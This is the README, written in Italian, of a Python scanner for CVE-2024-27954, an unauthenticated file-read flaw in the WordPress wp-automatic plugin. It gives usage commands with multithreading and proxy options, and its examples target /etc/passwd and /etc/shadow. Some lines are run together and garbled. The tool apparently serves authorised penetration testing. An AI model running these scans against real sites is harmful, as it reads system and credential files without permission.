
Scanner basato su Python per CVE-2024-27954, una vulnerabilità di Local File Inclusion nel plugin WordPress wp-automatic. Supporta scansione multithread, integrazione proxy e test di percorsi file personalizzati.
Questo progetto fornisce uno scanner Python per la vulnerabilità di Local File Inclusion (LFI) che mira a CVE-2024-27954, una falla critica riscontrata nel plugin WordPress wp-automatic. La vulnerabilità consente a un attaccante non autenticato di leggere file arbitrari sul server utilizzando un vettore di iniezione file://.
wp-automatic/etc/passwd, file di configurazione, codice sorgente)link non attendibile che utilizza lo schema file://requestsInstalla le dipendenze:
pip install requests
python3 CVE-2024-27954.py --url http://TARGET --lfi-path /etc/passwd
| Argument | Description |
|---|---|
--url | URL del singolo target (es. http://TARGET:8080) |
--list | File contenente l'elenco degli URL target (uno per riga) |
--lfi-path | Singolo percorso di file da testare (default: /etc/passwd) |
--paths-file | File con più percorsi di file (uno per riga) |
--proxy | Proxy (es. http://127.0.0.1:8080) |
--output | File in cui salvare i risultati vulnerabili |
--threads | Numero di thread concorrenti (default: 3) |
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/passwd --proxy "http://127.0.0.1:8080" --output results.txt
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/shadow --proxy "http://127.0.0.1:8080" --output results.txt

Questo strumento è destinato esclusivamente a scopi educativi e di penetration testing autorizzato. L'accesso non autorizzato ai sistemi potrebbe essere illegale. Usalo in modo responsabile.